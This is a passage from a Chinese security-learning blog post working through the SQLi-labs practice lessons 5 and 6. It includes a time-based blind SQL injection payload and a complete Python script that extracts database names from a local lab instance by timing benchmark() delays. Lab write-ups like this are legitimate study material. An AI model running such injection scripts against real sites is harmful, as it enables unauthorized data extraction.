<li>查询所有数据库<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;union select (if((substring(current,&quot;+str(i)+&quot;,1)=char(&quot;+str(j)+&quot;)),benchmark(50000000,encode(&apos;MSG&apos;,&apos;by 5 seconds&apos;)),null)),2,3 from (select group_concat(schema_name) as current from information_schema.schemata)as tb1--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>脚本如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">flag = &apos;&apos;</span><br><span class="line">for i in range(1,100):</span><br><span class="line">	n = 1</span><br><span class="line">	for j in range(33,127):</span><br><span class="line">		start = time.time()</span><br><span class="line">		#print start</span><br><span class="line">		#url1=&quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1&apos;union select (if((substring(current,&quot;+str(i)+&quot;,1)=char(&quot;+str(j)+&quot;)),benchmark(50000000,encode(&apos;MSG&apos;,&apos;by 5 seconds&apos;)),null)),2,3 from (select version() as current)as tb1--+&quot;</span><br><span class="line">		url1=&quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1&apos;union select (if((substring(current,&quot;+str(i)+&quot;,1)=char(&quot;+str(j)+&quot;)),benchmark(50000000,encode(&apos;MSG&apos;,&apos;by 5 seconds&apos;)),null)),2,3 from (select group_concat(schema_name) as current from information_schema.schemata)as tb1--+&quot;</span><br><span class="line">		r = requests.get(url=url1)</span><br><span class="line">		over = time.time()</span><br><span class="line">		#print over</span><br><span class="line">		n += 1</span><br><span class="line">		print over - start</span><br><span class="line">		print n</span><br><span class="line">		print &apos;---------------&apos;</span><br><span class="line">		if over - start &gt; 4:</span><br><span class="line">			flag += chr(j)</span><br><span class="line">			print flag</span><br><span class="line">			break</span><br><span class="line">	if n &gt;= (127-33):</span><br><span class="line">		break</span><br><span class="line">print flag</span><br></pre></td></tr></table></figure></p>
<h1 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h1><ol>
<li>输入<code>id=1&quot;</code>时报错<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">your MySQL server version for the right syntax to use near &apos;&quot;1&quot;&quot; LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>所以可以知道sql语句对id做了<code>&quot;1&quot;</code>的处理，我们只要闭合这个双引号，就可以对其进行注入，具体方法同less-5，这里就不多说了。</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>这部分开始涉及到脚本的编写，对不喜欢打代码又不怎么会用python的我，还是废了很多时间在python语法和函数上，最开始写出了一个直接爆破的，后面觉得太慢了，就想着去优化一下，用上了二分法，又折腾了好久，实现完二分法还是不太满意，围哥大佬又说可以用多线程来加快爆破进度，又琢磨了一早上，才勉强改了一个基于ASCII和SUBSTR的多线程的盲注脚本，其他函数的想着还是花点时间去写一写吧。</p>

      
    </div>
    
    
    

    
      <div>
        
    <div style="text-align:center;color: #CDBA96;font-size:14px;">
        ------ 本文结束<i class="fa fa-paw"></i>感谢您的阅读 ------</div>
    
      </div>
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持记录生活，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/weixin.png" alt="ju5tw4nty0u WeChat Pay"/>
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/zhifubao.png" alt="ju5tw4nty0u Alipay"/>
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    ju5tw4nty0u
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="http://ju5tw4nty0u.top/2018/03/17/SQL-LABS入门到放弃2（part1）/" title="SQL-LABS入门到放弃2（part1）">http://ju5tw4nty0u.top/2018/03/17/SQL-LABS入门到放弃2（part1）/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          
            <a href="/tags/SQL/" rel="tag"><i class="fa fa-tag"></i> SQL</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/16/SQL-LABS入门到放弃1（part1）/" rel="next" title="SQL-LABS入门到放弃1（part1）">
                <i class="fa fa-chevron-left"></i> SQL-LABS入门到放弃1（part1）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/03/23/SQL-LABS入门到放弃3（part1）/" rel="prev" title="SQL-LABS入门到放弃3（part1）">
                SQL-LABS入门到放弃3（part1） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table Des Matières
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Ensemble
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/headlogo.jpg"
                alt="ju5tw4nty0u" />
            
              <p class="site-author-name" itemprop="name">ju5tw4nty0u</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">articles</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/hqllsm" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:923351163@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.moctf.com/" title="MOCTF" target="_blank">MOCTF</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.xmutsec.com/" title="XMUTSEC" target="_blank">XMUTSEC</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lovegood.github.io/" title="Cytosine" target="_blank">Cytosine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://southseast.cc/" title="Southseast" target="_blank">Southseast</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.codemonster.cn/" title="CodeMonster" target="_blank">CodeMonster</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/Nepire/" title="Nepire" target="_blank">Nepire</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://white.xmutsec.com/" title="White" target="_blank">White</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.thecosmos.cn/" title="Cosmos" target="_blank">Cosmos</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sheldon.xmutsec.com/" title="Sheldon" target="_blank">Sheldon</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/saltyfish_yuch/" title="Saltyfishy" target="_blank">Saltyfishy</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/PeterZ1997/" title="PeterZ" target="_blank">PeterZ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://pcat.cnblogs.com/" title="Pcat" target="_blank">Pcat</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://skysec.top/" title="Sky's" target="_blank">Sky's</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://bestwing.me/" title="Swing" target="_blank">Swing</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://winforbest.github.io/" title="Winforbest" target="_blank">Winforbest</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://120.79.189.7/" title="郁离歌" target="_blank">郁离歌</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://qxian.top/" title="NetSpecter" target="_blank">NetSpecter</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://musicer.top/" title="musicer" target="_blank">musicer</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://anonym1ty.cn/" title="豆浆油条" target="_blank">豆浆油条</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://caijl21.github.io/" title="CaiJL" target="_blank">CaiJL</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.imstudy.online/" title="十八度的帝都" target="_blank">十八度的帝都</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#盲注及其分类"><span class="nav-number">2.</span> <span class="nav-text">盲注及其分类</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#盲注"><span class="nav-number">2.1.</span> <span class="nav-text">盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分类"><span class="nav-number">2.2.</span> <span class="nav-text">分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常用函数"><span class="nav-number">2.3.</span> <span class="nav-text">常用函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ascii函数"><span class="nav-number">2.3.1.</span> <span class="nav-text">ascii函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#substr函数"><span class="nav-number">2.3.2.</span> <span class="nav-text">substr函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#left函数"><span class="nav-number">2.3.3.</span> <span class="nav-text">left函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mid函数"><span class="nav-number">2.3.4.</span> <span class="nav-text">mid函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ord函数"><span class="nav-number">2.3.5.</span> <span class="nav-text">ord函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sleep函数"><span class="nav-number">2.3.6.</span> <span class="nav-text">sleep函数</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-5"><span class="nav-number">3.</span> <span class="nav-text">Less-5</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基于布尔"><span class="nav-number">3.1.</span> <span class="nav-text">基于布尔</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ascii-substr-mid-ord"><span class="nav-number">3.1.1.</span> <span class="nav-text">ascii substr mid ord</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#left-length"><span class="nav-number">3.1.2.</span> <span class="nav-text">left length</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#regexp"><span class="nav-number">3.1.3.</span> <span class="nav-text">regexp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于报错"><span class="nav-number">3.2.</span> <span class="nav-text">基于报错</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#count、-floor、-rand、-group-by"><span class="nav-number">3.2.1.</span> <span class="nav-text">count、 floor、 rand、 group by</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#double数字类型超出范围报错"><span class="nav-number">3.2.2.</span> <span class="nav-text">double数字类型超出范围报错</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bigint溢出"><span class="nav-number">3.2.3.</span> <span class="nav-text">bigint溢出</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xpath-extractvalue-updatexml"><span class="nav-number">3.2.4.</span> <span class="nav-text">xpath  (extractvalue\updatexml)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#数据的重复性报错"><span class="nav-number">3.2.5.</span> <span class="nav-text">数据的重复性报错</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于时间"><span class="nav-number">3.3.</span> <span class="nav-text">基于时间</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sleep"><span class="nav-number">3.3.1.</span> <span class="nav-text">sleep</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#benchmark"><span class="nav-number">3.3.2.</span> <span class="nav-text">benchmark</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-6"><span class="nav-number">4.</span> <span class="nav-text">Less-6</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后记"><span class="nav-number">5.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ju5tw4nty0u</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">23.7k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Thème &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




<span>
  Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a>
 </span>

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'duu7TJQYDmAC66inoqeJ1ld6-gzGzoHsz',
        appKey: 'hD34driPrUoThK3W7D13Jh2C',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("duu7TJQYDmAC66inoqeJ1ld6-gzGzoHsz", "hD34driPrUoThK3W7D13Jh2C");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
